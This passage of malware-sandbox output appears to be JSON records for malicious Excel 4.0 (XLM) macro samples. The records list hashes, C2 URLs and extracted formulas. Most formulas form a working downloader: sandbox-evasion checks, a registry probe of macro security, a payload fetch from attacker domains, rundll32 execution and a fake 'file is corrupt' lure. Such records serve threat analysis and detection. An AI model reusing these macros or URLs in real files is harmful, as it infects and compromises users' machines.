corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NIesSXRjLV\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94e5e737fd94f477720ab4428a07d9eff9a3464e0a61c89ffd1cf02a5f1fcb90"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94e5e737fd94f477720ab4428a07d9eff9a3464e0a61c89ffd1cf02a5f1fcb90","filesize":206336,"md5":"e86b70793b2c363e807b81e41a801134","sha1":"48f1ada7945ecc479cd1bbc6f711bd1ee93d382f","sha256":"94e5e737fd94f477720ab4428a07d9eff9a3464e0a61c89ffd1cf02a5f1fcb90","sha512":"e3de99607ffa89dca62298e8d52ce2ddb61923cf3d4fd1c667304e60b59c4d6bed9fe7996b70b9dbbd2dc2afaa9037a3ee3178150c35d31150c2b33e60ab0753","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94e5e737fd94f477720ab4428a07d9eff9a3464e0a61c89ffd1cf02a5f1fcb90.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RtfWNdMWgK\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94e74f9a60e51f4399f34a9bd9f1da93e0221ddf2a5475af7badac670de764c7"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94e74f9a60e51f4399f34a9bd9f1da93e0221ddf2a5475af7badac670de764c7","filesize":185344,"md5":"6cc51d83f1ceea165cfe8e641bddc72d","sha1":"3b9d45bd05a5c03ee46e34674bee2a4186688651","sha256":"94e74f9a60e51f4399f34a9bd9f1da93e0221ddf2a5475af7badac670de764c7","sha512":"7563b787ae346b8f936dd1d18e0b3fe89f28eaea440e0630c87be596950a7ca5e16db354564666efeee623a12c508d705c90d867b7ddb1c05612e24c90b9f6a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94e74f9a60e51f4399f34a9bd9f1da93e0221ddf2a5475af7badac670de764c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"94ec7da5bb664c0a4dde47e41ac12012e6625f3ee58e39c643e5ec5cbb44e2a0"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"94ec7da5bb664c0a4dde47e41ac12012e6625f3ee58e39c643e5ec5cbb44e2a0","filesize":206336,"md5":"b2084a4ade327c2955a4b8481d445978","sha1":"e85ce1fa42a84ea5bfbab4855096a2c3b31d54a0","sha256":"94ec7da5bb664c0a4dde47e41ac12012e6625f3ee58e39c643e5ec5cbb44e2a0","sha512":"03008aa62ec20443678af15f72a6edf7b61d204a3e532b38710d8afe1d49c929afe68539e6bce858eaa7fa84b7b7ec3bf4a775e49367485d92d4ca891614803f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"94ec7da5bb664c0a4dde47e41ac12012e6625f3ee58e39c643e5ec5cbb44e2a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sCqqHuNM4V\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9500469557f8f81064eb69702eae37429ae2931c4378dd8fc24cebf2279c850f"},"analysis":{"reported":"2020-04-09T16:17:47Z","score":10},"files":[{"filename":"9500469557f8f81064eb69702eae37429ae2931c4378dd8fc24cebf2279c850f","filesize":152576,"md5":"27c98dd4d9275a31c7edf79658fd0c1e","sha1":"9805c3911a3a41406e1a0931ab25d5d4aa2ef729","sha256":"9500469557f8f81064eb69702eae37429ae2931c4378dd8fc24cebf2279c850f","sha512":"5d5cd8e8110acc5b7793aff6a01047f7f60a69788e749947a62907b138b8c4bacbca9f3e9ccf7fed805238d1bd3f0da2742d4c17adf52c99ba7c62f447eed235","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9500469557f8f81064eb69702eae37429ae2931c4378dd8fc24cebf2279c850f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5pZSWWQW5j\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"951aeeb973c75d9f838cb7783aee9a7c91d427b1d23b30547a7db5ec4693b868"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"951aeeb973c75d9f838cb7783aee9a7c91d427b1d23b30547a7db5ec4693b868","filesize":209920,"md5":"4d24e9e0406dccb19b84f8aec1e48771","sha1":"a44873b78d1e72382723597f61d65118466bb072","sha256":"951aeeb973c75d9f838cb7783aee9a7c91d427b1d23b30547a7db5ec4693b868","sha512":"ad56dfe99a689126e4784d352ab2a94c4498ace9ca7e8e1036cb0c0f8c5abefbe03bf6a4265bf64150aa21b2a509b0ad2e8b812bc121b507d4e21b2be6de8307","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"951aeeb973c75d9f838cb7783aee9a7c91d427b1d23b30547a7db5ec4693b868.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IfStOkO6YZ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"952eedf98d5b32d5c6444a9c84963f1923eadbddc7604022e5f8c22862f3b6d2"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"952eedf98d5b32d5c6444a9c84963f1923eadbddc7604022e5f8c22862f3b6d2","filesize":47104,"md5":"1204f1bc2f4baaa4b13ebdfecb5fdcf3","sha1":"676ef50fd581beeaa63392ddbb53be988ccce239","sha256":"952eedf98d5b32d5c6444a9c84963f1923eadbddc7604022e5f8c22862f3b6d2","sha512":"cfd63fab3f936b8acc0bd3767da620f8ebc4620351f69cbfb69ea49c3be9aedb8269554bf94b48f6c2de5c891008136a41e9681ed330491e5b5c8d089fe7b86e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"952eedf98d5b32d5c6444a9c84963f1923eadbddc7604022e5f8c22862f3b6d2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(R$44C$1\u003c5,\"Lower temperature requirement - Please consult engineering.\",\"Okay low temperature\")\nIF(R$46C$1\u003c15,\"Lower humidity requirement - Please consult engineering.\",\"Okay low humidity\")\nIF(R$48C$1\u003c600,\"Lower pressure requirement - Please consult engineering.\",\"Okay low pressure\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9533f9ccb9b4e8971a3ca1dc64b314ec239a17a2590874d0bdfe70fdd36c698b"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"9533f9ccb9b4e8971a3ca1dc64b314ec239a17a2590874d0bdfe70fdd36c698b","filesize":209920,"md5":"f51042f96538156b2076907d64ca8258","sha1":"ea75e9928906022a15d57aead43d5b5f0fda17cc","sha256":"9533f9ccb9b4e8971a3ca1dc64b314ec239a17a2590874d0bdfe70fdd36c698b","sha512":"2e18d4501960e32fbf34ff513586b18d7d21087088af4877626ec8f9c090269e96129602e2b889234eb75adb245e198f54e4a351670e5725ff8acb273b245c66","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9533f9ccb9b4e8971a3ca1dc64b314ec239a17a2590874d0bdfe70fdd36c698b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"N5oQgH60SS\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9547fc463344ad693e39c7c8a93ede59480d4ce83e75abe6052b7421f9765242"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"9547fc463344ad693e39c7c8a93ede59480d4ce83e75abe6052b7421f9765242","filesize":167936,"md5":"cf0982104b57500338b8a4873ba1ca42","sha1":"56d7d71ddc62c09b23a7785504cb771c1044fa90","sha256":"9547fc463344ad693e39c7c8a93ede59480d4ce83e75abe6052b7421f9765242","sha512":"263710e2cc8ec83817490856e8c3575a59d40a65a1d83e1130648fb2d8c0995b37946aa7947c05839740f7a645f415ee15cc1aebf80db8c3d6bf9807eea8f85f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9547fc463344ad693e39c7c8a93ede59480d4ce83e75abe6052b7421f9765242.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ipmJeKdaEb\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9560627449af066c5764f7aefd2c7414f744e2359ab67cc7f21e3cec41457885"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"9560627449af066c5764f7aefd2c7414f744e2359ab67cc7f21e3cec41457885","filesize":185344,"md5":"c65ba2afee61ebb6cc0ea28caec6ba02","sha1":"9ce004eddcddb24855307a08000382b07a4f13d5","sha256":"9560627449af066c5764f7aefd2c7414f744e2359ab67cc7f21e3cec41457885","sha512":"eaf7f7f9b1d09b84475254664e229affaae3a42d58900dc1f27e2b9c6a21d8559c3b34251599378a908e92853147ed40617e3379fb2f15202ce3c931e3cca116","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9560627449af066c5764f7aefd2c7414f744e2359ab67cc7f21e3cec41457885.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"95606c81f905862310bb461ff589ff826142d30de06c89ddf84f325711d00c2d"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"95606c81f905862310bb461ff589ff826142d30de06c89ddf84f325711d00c2d","filesize":209920,"md5":"783bc2ec44502ad74adec2047bd675fe","sha1":"40c9a167fa7a2bb99edc95ec44424466a743920b","sha256":"95606c81f905862310bb461ff589ff826142d30de06c89ddf84f325711d00c2d","sha512":"13445bf63b7677125563132085d8a4dc6f34ad631e8fe6a5d38bfd6f04a6dde782dfce64474897f00ae132d338240603fe7aba238a09b44cbff672f27c2e51d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"95606c81f905862310bb461ff589ff826142d30de06c89ddf84f325711d00c2d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"N8VkkHWUNL\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"957c60604573b4d36c8ce28f3e06abc0aafe15725e4350cfcdabd9b72e90fd76"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"957c60604573b4d36c8ce28f3e06abc0aafe15725e4350cfcdabd9b72e90fd76","filesize":185344,"md5":"833784865345703c06d6670888b5b163","sha1":"e1ac2c34866f64e0e579caefaf630a865eff914b","sha256":"957c60604573b4d36c8ce28f3e06abc0aafe15725e4350cfcdabd9b72e90fd76","sha512":"32387594dd82f7e7ea2ec932e6aaf99e3c403fba1e3790749a2ebb124da62a7057d39441633129343ddc643482b8276f95e6437d9cfc008fd2d9172410658301","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"957c60604573b4d36c8ce28f3e06abc0aafe15725e4350cfcdabd9b72e90fd76.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"958e291f5503fbc2d0cedc56942acc2821c19a3cdb12dc5039ec0cd1bc740202"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"958e291f5503fbc2d0cedc56942acc2821c19a3cdb12dc5039ec0cd1bc740202","filesize":144384,"md5":"c3aa04bd0b4b3d6fe0de42dbe22d5a6e","sha1":"d5ae55434d592ec0d1f12ce5d316d3b8dc207e9c","sha256":"958e291f5503fbc2d0cedc56942acc2821c19a3cdb12dc5039ec0cd1bc740202","sha512":"8beb66b7b6979330690e765d0ceedc72671cb7d405d72c075af867e5d546142d7d088222264b25ffd2f55bcbf3bf22c665ca62d25c41f708f7a0f6e94dde4ca6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"958e291f5503fbc2d0cedc56942acc2821c19a3cdb12dc5039ec0cd1bc740202.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"bbMmxqxLjt\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"95ae036738be2b2dc2d80d3fcc1dfc0d84bb0e93769ea076d00b91b8483b750f"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"95ae036738be2b2dc2d80d3fcc1dfc0d84bb0e93769ea076d00b91b8483b750f","filesize":168960,"md5":"5f1d2d6f5bb1026f18ef034da2d1bc3c","sha1":"60750feb41dac23309c01dff5c9e2f362d4e0fdf","sha256":"95ae036738be2b2dc2d80d3fcc1dfc0d84bb0e93769ea076d00b91b8483b750f","sha512":"de8787ca208c3340fdf7a4a68bfbbfda59685eca3eb3b0d3b7a719ff1523be589ad6466c26970ae0eea3ae4c5352719afe90e3037fecbe4b09217db76d05afd2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"95ae036738be2b2dc2d80d3fcc1dfc0d84bb0e93769ea076d00b91b8483b750f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"h2cvLUaozm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"95c654ee314df65accd5ce32653c5583db5f688dc97c49a10657c14b85d9b647"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"95c654ee314df65accd5ce32653c5583db5f688dc97c49a10657c14b85d9b647","filesize":209920,"md5":"b3aebb860d6cd5d8d4f694c9e3f514af","sha1":"efa3cf6e8dee21e3a142ef8a7d76ea67f27736f1","sha256":"95c654ee314df65accd5ce32653c5583db5f688dc97c49a10657c14b85d9b647","sha512":"c5494b22770e9996464f7cb6ef7b13b32cdae39f5948b5470cd0d1e31e7624522ec3773641d2b6de4ffc9ce6022a335daaf775bc2cf035ca52dd86ea007974e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"95c654ee314df65accd5ce32653c5583db5f688dc97c49a10657c14b85d9b647.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Q8UkeU7nPu\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"95cf589ad5bdda78526edd94bc9d2620025ff539b34c6db6065de6f37d43bf0b"},"analysis":{"reported":"2020-04-09T16:17:48Z","score":10},"files":[{"filename":"95cf589ad5bdda78526edd94bc9d2620025ff539b34c6db6065de6f37d43bf0b","filesize":167936,"md5":"d85c69d0413c0c208b29dc830fc5bafe","sha1":"7b3aa93532f8490ca7b7e46392a71fb1dcc9b369","sha256":"95cf589ad5bdda78526edd94bc9d2620025ff539b34c6db6065de6f37d43bf0b","sha512":"873fdae40aacd17d9a5cb2740d94750a140be3c53e9392c49eeacfd97897ff08673005c7db9d663014a5e1082d13047b67b1a16414c888b41e15e448ab3ac9da","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"95cf589ad5bdda78526edd94bc9d2620025ff539b34c6db6065de6f37d43bf0b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, 